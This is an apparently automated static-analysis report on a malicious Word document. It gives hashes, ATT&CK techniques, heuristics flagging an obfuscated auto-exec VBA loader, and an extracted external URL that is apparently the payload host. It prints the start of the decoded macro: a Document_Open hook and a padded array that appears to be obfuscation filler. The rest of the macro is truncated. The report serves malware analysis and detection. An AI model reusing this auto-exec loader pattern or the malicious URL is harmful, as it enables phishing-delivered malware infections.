Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 2993bc7940ba58d6…

MALICIOUS

Office (OOXML)

Size: 170.8 KB
Created: 2018-02-27 14:28:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2020-07-24
MD5: 9dfc21b5f00a8a0a4af8f4db158c1fa0 SHA-1: a8cab47051161989631fb95ab00f71408b84ddc2 SHA-256: 2993bc7940ba58d6f577678b27651a71a55cc6a340f4ca7e995b16f0e9e40398
Risk Score: 210

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is a malicious OOXML document containing a VBA project with an auto-executing macro named 'Document_Open'. The macro is obfuscated and likely uses 'CreateObject' to download and execute a second-stage payload. The 'Document_Open' and 'CreateObject' findings, together with the obfuscated-loader heuristic, point strongly to this pattern.

Heuristics (7)

  • [medium] VBA project inside OOXML (OOXML_VBA, 5 related findings)
    Document contains a VBA project: VBA macros present.
  • [critical] Obfuscated auto-exec VBA loader (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • [high] Document_Open macro (OLE_VBA_DOCOPEN)
    Document_Open macro present.
  • [high] CreateObject call (OLE_VBA_CREATEOBJ)
    CreateObject call present.
  • [high] VBA p-code auto-exec with execution tokens (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • [low] Environ() call, environment variable access (OLE_VBA_ENVIRON)
    Environ() call present.
  • [info] Embedded URL (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs, all reached via document text (OOXML body / shared strings). Only the first is an external address; the remaining entries are standard OOXML and Word XML namespace URIs that appear in every document of this type.
    • http://dooo77.imparisystems.com/43333.php
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 51396 bytes
SHA-256: c6dad5fe5a9f25c10f07869086208479c7f5aed40d47c41ac5f43ec44bedb2bf
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
uRJtiF.Show
End Sub





Attribute VB_Name = "uRJtiF"
Attribute VB_Base = "0{7BE84FEA-0414-4C45-93A4-EB12465ED9C2}{B4CF10B2-1F38-4AE6-AF32-2ECD78189244}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public sSKmLMf As String
Public jbNrfMh As Object
Dim dgfgnnnn(309, 2) As String
Private Sub UserForm_Activate()
On Error Resume Next

uRJtiF.Hide
dgfgnnnn(0, 0) = "a number of"
dgfgnnnn(0, 1) = "'many' or 'some'"
dgfgnnnn(1, 0) = "abundance"
dgfgnnnn(1, 1) = "'enough' or 'plenty'"
dgfgnnnn(2, 0) = "accede to"
dgfgnnnn(2, 1) = "'agree to' or 'allow'"
dgfgnnnn(3, 0) = "accelerate"
dgfgnnnn(3, 1) = "'speed up'"
dgfgnnnn(4, 0) = "accentuate"
dgfgnnnn(4, 1) = "'stress'"
dgfgnnnn(5, 0) = "accompany"
dgfgnnnn(5, 1) = "'go with' or 'with'"
dgfgnnnn(6, 0) = "accomplish"
dgfgnnnn(6, 1) = "'carry out' or 'do'"
dgfgnnnn(7, 0) = "accorded"
dgfgnnnn(7, 1) = "'given'"
dgfgnnnn(8, 0) = "accordingly"
dgfgnnnn(8, 1) = "'so'"
dgfgnnnn(9, 0) = "accrue"
dgfgnnnn(9, 1) = "'add' or 'gain'"
dgfgnnnn(10, 0) = "accurate"
dgfgnnnn(10, 1) = "'correct' or 'exact' or 'right'"
dgfgnnnn(11, 0) = "acquiesce"
dgfgnnnn(11, 1) = "'agree'"
dgfgnnnn(12, 0) = "acquire"
dgfgnnnn(12, 1) = "'get'"
dgfgnnnn(13, 0) = "additional"
dgfgnnnn(13, 1) = "'added' or 'extra' or 'more' or 'other'"
dgfgnnnn(14, 0) = "addressees"
dgfgnnnn(14, 1) = "'you'"
dgfgnnnn(15, 0) = "addressees are requested"
dgfgnnnn(15, 1) = "'please'"
dgfgnnnn(16, 0) = "adjacent to"
dgfgnnnn(16, 1) = "'next to'"
dgfgnnnn(17, 0) = "adjustment"
dgfgnnnn(17, 1) = "'change'"
dgfgnnnn(18, 0) = "admissible"
dgfgnnnn(18, 1) = "'accepted' or 'allowed'"
dgfgnnnn(19, 0) = "advantageous"
dgfgnnnn(19, 1) = "'helpful'"
dgfgnnnn(20, 0) = "adversely impact"
dgfgnnnn(20, 1) = "'hurt'"
dgfgnnnn(21, 0) = "adversely impact on"
dgfgnnnn(21, 1) = "'hurt' or 'set back'"
dgfgnnnn(22, 0) = "advise"
dgfgnnnn(22, 1) = "'recommend' or 'tell'"
dgfgnnnn(23, 0) = "afford an opportunity"
dgfgnnnn(23, 1) = "'allow' or 'let'"
dgfgnnnn(24, 0) = "aforementioned"
dgfgnnnn(24, 1) = "'remove'"
dgfgnnnn(25, 0) = "aggregate"
dgfgnnnn(25, 1) = "'add' or 'total'"
dgfgnnnn(26, 0) = "aircraft"
dgfgnnnn(26, 1) = "'plane'"
dgfgnnnn(27, 0) = "all of"
dgfgnnnn(27, 1) = "'all'"
dgfgnnnn(28, 0) = "alleviate"
dgfgnnnn(28, 1) = "'ease' or 'reduce'"
dgfgnnnn(29, 0) = "allocate"
dgfgnnnn(29, 1) = "'divide'"
dgfgnnnn(30, 0) = "along the lines of"
dgfgnnnn(30, 1) = "'as in' or 'like'"
dgfgnnnn(31, 0) = "already existing"
dgfgnnnn(31, 1) = "'existing'"
dgfgnnnn(32, 0) = "alternatively"
dgfgnnnn(32, 1) = "'or'"
dgfgnnnn(33, 0) = "ameliorate"
dgfgnnnn(33, 1) = "'help' or 'improve'"
dgfgnnnn(34, 0) = "and/or"
dgfgnnnn(34, 1) = "' ? or ? or both'"
dgfgnnnn(35, 0) = "anticipate"
dgfgnnnn(35, 1) = "'expect'"
dgfgnnnn(36, 0) = "apparent"
dgfgnnnn(36, 1) = "'clear' or 'plain'"
dgfgnnnn(37, 0) = "appreciable"
dgfgnnnn(37, 1) = "'many'"
dgfgnnnn(38, 0) = "appropriate"
dgfgnnnn(38, 1) = "'proper' or 'right'"
dgfgnnnn(39, 0) = "approximate"
dgfgnnnn(39, 1) = "'about'"
dgfgnnnn(40, 0) = "arrive onboard"
dgfgnnnn(40, 1) = "'arrive'"
dgfgnnnn(41, 0) = "as a means of"
dgfgnnnn(41, 1) = "'to'"
dgfgnnnn(42, 0) = "as of yet"
dgfgnnnn(42, 1) = "'yet'"
dgfgnnnn(43, 0) = "as prescribed by"
dgfgnnnn(43, 1) = "'in'"
dgfgnnnn(44, 0) = "as to"
dgfgnnnn(44, 1) = "'about' or 'on'"
dgfgnnnn(45, 0) = "as yet"
dgfgnnnn(45, 1) = "'yet'"
dgfgnnnn(46, 0) = "ascertain"
dgfgnnnn(46, 1) = "'find out' or 'learn'"
dgfgnnnn(47, 0) = "assist"
dgfgnnnn(47, 1) = "'aid' or 'help'"
dgfgnnnn(48, 0) = "assistance"
dgfgnnnn
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 99840 bytes
SHA-256: e19a2b589c16f6003a3536f7a26e093102748feb06b6764cf891ff5bb8ba99b6